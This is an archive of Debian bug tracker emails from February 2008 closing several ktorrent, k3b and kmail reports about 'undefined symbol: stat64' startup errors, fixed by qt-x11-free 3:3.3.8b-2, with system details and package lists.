  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: i386 (i686)

Kernel: Linux 2.6.22
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages libqt3-mt depends on:
ii  fontconfig 2.5.0-2   generic font configuration library
ii  libaudio2  1.9.1-1   Network Audio System - shared libr
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libfontconfig1 2.5.0-2   generic font configuration library
ii  libfreetype6   2.3.5-1+b1FreeType 2 font engine, shared lib
ii  libgcc11:4.3-20080202-1  GCC support library
ii  libice62:1.0.4-1 X11 Inter-Client Exchange library
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG 
ii  libmng11.0.9-1   Multiple-image Network Graphics li
ii  libpng12-0 1.2.15~beta5-3PNG library - runtime
ii  libsm6 2:1.0.3-1+b1  X11 Session Management library
ii  libstdc++6 4.3-20080202-1The GNU Standard C++ Library v3
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11:1.1.9-1 X cursor management library
ii  libxext6   1:1.0.3-2 X11 miscellaneous extension librar
ii  libxft22.1.12-2  FreeType-based font drawing librar
ii  libxi6 2:1.1.3-1 X11 Input extension library
ii  libxinerama1   1:1.0.2-1 X11 Xinerama extension library
ii  libxrandr2 2:1.2.2-1 X11 RandR extension library
ii  libxrender11:0.9.4-1 X Rendering Extension client libra
ii  libxt6 1:1.0.5-3 X11 toolkit intrinsics library
ii  zlib1g 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages libqt3-mt recommends:
ii  libgl1-mesa-glx [libgl1]  7.0.2-4A free implementation of the OpenG
ii  libglu1-mesa [libglu1]7.0.2-4The OpenGL utility library (GLU)
ii  libxmu6   2:1.0.4-1  X11 miscellaneous utility library

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt

Bug#465842: marked as done (undefined symbol: stat64 (ktorrent doesn't start))

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding undefined symbol: stat64 (ktorrent doesn't start)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave

--- Please enter the report below this line. ---

ktorrent fail to start, giving the following error message:

ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so:
undefined symbol: lstat64
DCOP aborting (delayed) call from 'anonymous-27184' to 'ktorrent'

--- System information. ---
Architecture: amd64
Kernel:   Linux 2.6.24-2.6.24.2.slh.6-sidux-amd64

Debian Release: lenny/sid
  999 unstablesidux.com
  888 unstableftp.it.debian.org
  503 unstablewww.debian-multimedia.org
  502 unstableftp.debian-unofficial.org
  222 experimentalftp.it.debian.org
  103 experimentalwww.debian-multimedia.org

--- Package information. ---
Depends  (Version) | Installed
==-+-==
kdelibs4c2a  (>= 4:3.5.8.dfsg.1-5) | 4:3.5.8.dfsg.1-7
libavahi-client3   (>= 0.6.13) | 0.6.22-2
libavahi-common3   (>= 0.6.10) | 0.6.22-2
libavahi-qt3-1  (>= 0.6.0) | 0.6.22-2
libc6   (>= 2.7-1) | 2.7-8
libgcc1(>= 1:4.1.1-21) | 1:4.3-20080202-1
libgeoip1  | 1.4.4.dfsg-1
libgmp3c2  | 2:4.2.2+dfsg-2
libqt3-mt (>= 3:3.3.7) | 3:3.3.8b-1
libstdc++6(>= 4.2.1-4) | 4.3-20080202-1


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance sof

Bug#465480: marked as done (k3b always crashes when I want to burn something)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding k3b always crashes when I want to burn something
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6
Severity: important

--- Please enter the report below this line. ---

Since 2 or 3 days I have a problem with k3b, which can't anymore. When I
want to burn or to erase a CD or DVD, there is always the same error
message:

k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64

I don't know whats going wrong, because with other guis and with the
command line I have no problems.

--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.24-athlon

Debian Release: lenny/sid
  500 unstablemirror.noreply.org 
  500 unstableftp.de.debian.org 
  500 unstabledebian.netcologne.de 
  500 testing security.debian.org 
  500 testing ftp.de.debian.org 
  500 stable  security.debian.org 
1 experimentalftp.de.debian.org 

--- Package information. ---
Depends (Version) | Installed
=-+-===
cdparanoia (>= 3a9.8) | 3.10+debian~pre0-6
cdrdao   (>= 1.1.7-5) | 1:1.2.2-11
genisoimage   | 9:1.1.6-1
k3b-data  (= 1.0.4-6) | 1.0.4-6
kdelibs-data   (>= 4:3.1.4-2) | 4:3.5.8.dfsg.1-7
kdelibs4c2a (>= 4:3.5.8.dfsg.1-5) | 4:3.5.8.dfsg.1-7
libacl1 (>= 2.2.11-1) | 2.2.45-1
libart-2.0-2  (>= 2.3.18) | 2.3.20-1
libattr1 (>= 2.4.4-1) | 1:2.4.39-1
libaudio2 | 1.9.1-1
libc6  (>= 2.7-1) | 2.7-6
libdbus-1-3(>= 1.1.1) | 1.1.2-1
libdbus-qt-1-1c2   (>= 0.62.git.20060814) | 0.62.git.20060814-2
libdvdread3(>= 0.9.7) | 0.9.7-6
libexpat1 (>= 1.95.8) | 1.95.8-4
libfam0   | 2.7.0-13
libfontconfig1 (>= 2.4.0) | 2.5.0-2
libfreetype6   (>= 2.3.5) | 2.3.5-1+b1
libgcc1   (>= 1:4.1.1-21) | 1:4.3-20080202-1
libhal1   (>= 0.5.10) | 0.5.10-5
libice6  (>= 1:1.0.0) | 2:1.0.4-1
libidn11  (>= 0.5.18) | 1.4-1
libjpeg62 | 6b-14
libk3b3(>= 1.0.4) | 1.0.4-6
libmusicbrainz4c2a (>= 2.1.5) | 2.1.5-1
libpng12-0  (>= 1.2.13-4) | 1.2.15~beta5-3
libqt3-mt(>= 3:3.3.7) | 3:3.3.8b-1
libsm6| 2:1.0.3-1+b1
libstdc++6  (>= 4.1.1-21) | 4.3-20080202-1
libx11-6  | 2:1.0.3-7
libxcursor1(>> 1.1.2) | 1:1.1.9-1
libxext6  | 1:1.0.3-2
libxft2(>> 2.1.1) | 2.1.12-2
libxi6| 2:1.1.3-1
libxinerama1  | 1:1.0.2-1
libxrandr2   (>= 2:1.2.0) | 2:1.2.2-1
libxrender1   | 1:0.9.4-1
libxt6| 1:1.0.5-3
wodim | 9:1.1.6-1
 OR cdrskin   | 
zlib1g| 1:1.2.3.3.dfsg-11


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q

Bug#465555: marked as done (kmail symbol lookup error at startup)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding kmail symbol lookup error at startup
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: kmail
Version: 4:3.5.8-1
Severity: important

kmail crashes at startup with a symbol lookup error

$ kmail
kbuildsycoca running...
kmail: symbol lookup error: /usr/lib/libkmailprivate.so: undefined
symbol: fstat64
DCOP aborting (delayed) call from 'anonymous-9573' to 'kmail'

this is kmail 1.9.7

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: powerpc (ppc)

Kernel: Linux 2.6.24-1-powerpc
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages kmail depends on:
ii  kdebase-kio-plugins4:3.5.8.dfsg.1-7  core I/O slaves for KDE
ii  kdelibs4c2a4:3.5.8.dfsg.1-7  core libraries and binaries for al
ii  kdepim-kio-plugins 4:3.5.8-1 KDE pim I/O Slaves
ii  libart-2.0-2   2.3.20-1  Library of functions for 2D graphi
ii  libaudio2  1.9.1-1   Network Audio System - shared libr
ii  libc6  2.7-6 GNU C Library: Shared libraries
ii  libfontconfig1 2.5.0-2   generic font configuration library
ii  libfreetype6   2.3.5-1   FreeType 2 font engine, shared lib
ii  libgcc11:4.3-20080202-1  GCC support library
ii  libice62:1.0.4-1 X11 Inter-Client Exchange library
ii  libidn11   1.4-1 GNU libidn library, implementation
ii  libjpeg62  6b-14 The Independent JPEG Group's JPEG
ii  libkcal2b  4:3.5.8-1 KDE calendaring library
ii  libkdepim1a4:3.5.8-1 KDE PIM library
ii  libkleopatra1  4:3.5.8-1 KDE GnuPG interface libraries
ii  libkmime2  4:3.5.8-1 KDE MIME interface library
ii  libkpimidentities1 4:3.5.8-1 KDE PIM user identity information
ii  libksieve0 4:3.5.8-1 KDE mail/news message filtering li
ii  libmimelib1c2a 4:3.5.8-1 KDE mime library
ii  libpng12-0 1.2.15~beta5-3PNG library - runtime
ii  libqt3-mt  3:3.3.8b-1Qt GUI Library (Threaded runtime v
ii  libsm6 2:1.0.3-1+b1  X11 Session Management library
ii  libstdc++6 4.3-20080202-1The GNU Standard C++ Library v3
ii  libx11-6   2:1.0.3-7 X11 client-side library
ii  libxcursor11:1.1.9-1 X cursor management library
ii  libxext6   1:1.0.3-2 X11 miscellaneous extension librar
ii  libxft22.1.12-2  FreeType-based font drawing librar
ii  libxi6 2:1.1.3-1 X11 Input extension library
ii  libxinerama1   1:1.0.2-1 X11 Xinerama extension library
ii  libxrandr2 2:1.2.2-1 X11 RandR extension library
ii  libxrender11:0.9.4-1 X Rendering Extension client libra
ii  libxt6 1:1.0.5-3 X11 toolkit intrinsics library
ii  perl   5.8.8-12  Larry Wall's Practical Extraction
ii  zlib1g 1:1.2.3.3.dfsg-11 compression library - runtime

Versions of packages kmail recommends:
ii  procmail  3.22-16Versatile e-mail processor

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/lib

Bug#465602: marked as done (fails to start, depends on non-exist symbol lstat64 in libktorrent-2.2.5.so)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding fails to start, depends on non-exist symbol lstat64 in 
libktorrent-2.2.5.so
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: ktorrent
Version: 2.2.5.dfsg.1-1
Severity: grave
Justification: renders package unusable

[EMAIL PROTECTED]
ktorrent: symbol lookup error: /usr/lib/libktorrent-2.2.5.so: undefined
symbol: lstat64

I think it's buggy build, rebuilding from deb-src solves the problem.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24.2-local (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages ktorrent depends on:
ii  kdelibs4c2a 4:3.5.8.dfsg.1-7 core libraries and binaries for al
ii  libavahi-client30.6.22-2 Avahi client library
ii  libavahi-common30.6.22-2 Avahi common library
ii  libavahi-qt3-1  0.6.22-2 Avahi Qt 3 integration library
ii  libc6   2.7-6GNU C Library: Shared libraries
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libgeoip1   1.4.4.dfsg-1 A non-DNS IP-to-country resolver l
ii  libgmp3c2   2:4.2.2+dfsg-2   Multiprecision arithmetic library
ii  libqt3-mt   3:3.3.8b-1   Qt GUI Library (Threaded runtime v
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3

Versions of packages ktorrent recommends:
ii  kdebase-data4:3.5.8.dfsg.1-7 shared data files for the KDE base
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE

-- debconf-show failed


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported is fixed in the latest version of
qt-x11-free, which is due to be installed in the Debian FTP archive:

libqt3-compat-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-compat-headers_3.3.8b-2_amd64.deb
libqt3-headers_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-headers_3.3.8b-2_amd64.deb
libqt3-i18n_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/libqt3-i18n_3.3.8b-2_all.deb
libqt3-mt-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-dev_3.3.8b-2_amd64.deb
libqt3-mt-ibase_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-ibase_3.3.8b-2_amd64.deb
libqt3-mt-mysql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-mysql_3.3.8b-2_amd64.deb
libqt3-mt-odbc_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-odbc_3.3.8b-2_amd64.deb
libqt3-mt-psql_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-psql_3.3.8b-2_amd64.deb
libqt3-mt-sqlite_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt-sqlite_3.3.8b-2_amd64.deb
libqt3-mt_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/libqt3-mt_3.3.8b-2_amd64.deb
qt-x11-free-dbg_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt-x11-free-dbg_3.3.8b-2_amd64.deb
qt-x11-free_3.3.8b-2.diff.gz
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.diff.gz
qt-x11-free_3.3.8b-2.dsc
  to pool/main/q/qt-x11-free/qt-x11-free_3.3.8b-2.dsc
qt3-apps-dev_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-apps-dev_3.3.8b-2_amd64.deb
qt3-assistant_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-assistant_3.3.8b-2_amd64.deb
qt3-designer_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-designer_3.3.8b-2_amd64.deb
qt3-dev-tools-compat_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-compat_3.3.8b-2_amd64.deb
qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools-embedded_3.3.8b-2_amd64.deb
qt3-dev-tools_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-dev-tools_3.3.8b-2_amd64.deb
qt3-doc_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-doc_3.3.8b-2_all.deb
qt3-examples_3.3.8b-2_all.deb
  to pool/main/q/qt-x11-free/qt3-examples_3.3.8b-2_all.deb
qt3-linguist_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-linguist_3.3.8b-2_amd64.deb
qt3-qtconfig_3.3.8b-2_amd64.deb
  to pool/main/q/qt-x11-free/qt3-qtconfig_3.3.8b-2_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed. 

Bug#465311: marked as done (k3b: fails with symbol lookup error)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding k3b: fails with symbol lookup error
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6
Severity: grave
Justification: renders package unusable

K3b sporadically fails with the following message (current guess is that
it crashed when reading the media):

k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.24-toi-rc5 (SMP w/1 CPU core)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages k3b depends on:
ii  cdparanoia   3.10+debian~pre0-6  audio extraction tool for sampling
ii  cdrdao   1:1.2.2-11  records CDs in Disk-At-Once (DAO) 
ii  genisoimage  9:1.1.6-1   Creates ISO-9660 CD-ROM filesystem
ii  k3b-data 1.0.4-6 A sophisticated KDE CD burning app
ii  kdelibs-data 4:3.5.8.dfsg.1-7core shared data for all KDE appli
ii  kdelibs4c2a  4:3.5.8.dfsg.1-7core libraries and binaries for al
ii  libacl1  2.2.45-1Access control list shared library
ii  libart-2.0-2 2.3.20-1Library of functions for 2D graphi
ii  libattr1 1:2.4.39-1  Extended attribute shared library
ii  libaudio21.9.1-1 Network Audio System - shared libr
ii  libc62.7-6   GNU C Library: Shared libraries
ii  libdbus-1-3  1.1.2-1 simple interprocess messaging syst
ii  libdbus-qt-1-1c2 0.62.git.20060814-2 simple interprocess messaging syst
ii  libdvdread3  0.9.7-6 library for reading DVDs
ii  libexpat11.95.8-4XML parsing C library - runtime li
ii  libfam0  2.7.0-13.1  Client library to control the FAM 
ii  libfontconfig1   2.5.0-2 generic font configuration library
ii  libfreetype6 2.3.5-1+b1  FreeType 2 font engine, shared lib
ii  libgcc1  1:4.3-20080202-1GCC support library
ii  libhal1  0.5.10-5Hardware Abstraction Layer - share
ii  libice6  2:1.0.4-1   X11 Inter-Client Exchange library
ii  libidn11 1.4-1   GNU libidn library, implementation
ii  libjpeg626b-14   The Independent JPEG Group's JPEG 
ii  libk3b3  1.0.4-6 The KDE cd burning application lib
ii  libmusicbrainz4c2a   2.1.5-1 Second generation incarnation of t
ii  libpng12-0   1.2.15~beta5-3  PNG library - runtime
ii  libqt3-mt3:3.3.8b-1  Qt GUI Library (Threaded runtime v
ii  libsm6   2:1.0.3-1+b1X11 Session Management library
ii  libstdc++6   4.3-20080202-1  The GNU Standard C++ Library v3
ii  libx11-6 2:1.1.1-1   X11 client-side library
ii  libxcursor1  1:1.1.9-1   X cursor management library
ii  libxext6 1:1.0.3-2   X11 miscellaneous extension librar
ii  libxft2  2.1.12-2FreeType-based font drawing librar
ii  libxi6   2:1.1.3-1   X11 Input extension library
ii  libxinerama1 1:1.0.2-1   X11 Xinerama extension library
ii  libxrandr2   2:1.2.2-1   X11 RandR extension library
ii  libxrender1  1:0.9.4-1   X Rendering Extension client libra
ii  libxt6   1:1.0.5-3   X11 toolkit intrinsics library
ii  wodim9:1.1.6-1   command line CD/DVD writing tool
ii  zlib1g   1:1.2.3.3.dfsg-11   compression library - runtime

Versions of packages k3b recommends:
ii  dvd+rw-tools7.0-9DVD+-RW/R tools
ii  kcontrol4:3.5.8.dfsg.1-7 control center for KDE
ii  kdebase-kio-plugins 4:3.5.8.dfsg.1-7 core I/O slaves for KDE
ii  vcdimager   0.7.23-4 A VideoCD (VCD) image mastering an

-- no debconf information


--- End Message ---
--- Begin Message ---
Source: qt-x11-free
Source-Version: 3:3.3.8b-2

We believe that the bug you reported

Bug#465649: marked as done (k3b crashes, symbol lookup error)

2008-02-16 Thread Debian Bug Tracking System

Your message dated Sat, 16 Feb 2008 16:47:10 +
with message-id <[EMAIL PROTECTED]>
and subject line Bug#465028: fixed in qt-x11-free 3:3.3.8b-2
has caused the Debian Bug report #465028,
regarding k3b crashes, symbol lookup error
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
465028: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=465028
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: k3b
Version: 1.0.4-6
Severity: grave
Justification: renders package unusable


k3b: symbol lookup error: /usr/lib/libk3b.so.3: undefined symbol: stat64
Buggy build, in the ktorrent the same, rebuild from deb-src solves
problem.

-- System Information:
Debian Release: lenny/sid
  APT prefers unstable
  APT policy: (990, 'unstable'), (500, 'stable')
Architecture: i386 (i686)

Kernel: Linux 2.6.24.2-local (SMP w/2 CPU cores)
Locale: LANG=ru_RU.UTF-8, LC_CTYPE=ru_RU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages k3b depends on:
ii  cdparanoia   3.10+debian~pre0-6  audio extraction tool for sampling
ii  cdrdao   1:1.2.2-11  records CDs in Disk-At-Once (DAO) 
ii  genisoimage  9:1.1.6-1   Creates ISO-9660 CD-ROM filesystem
ii  k3b-data 1.0.4-6 A sophisticated KDE CD burning app
ii  kdelibs-data 4:3.5.8.dfsg.1-7core shared data for all KDE appli
ii  kdelibs4c2a  4:3.5.8.dfsg.1-7core libraries and binaries for al
ii  libacl1  2.2.45-1Access control list shared library
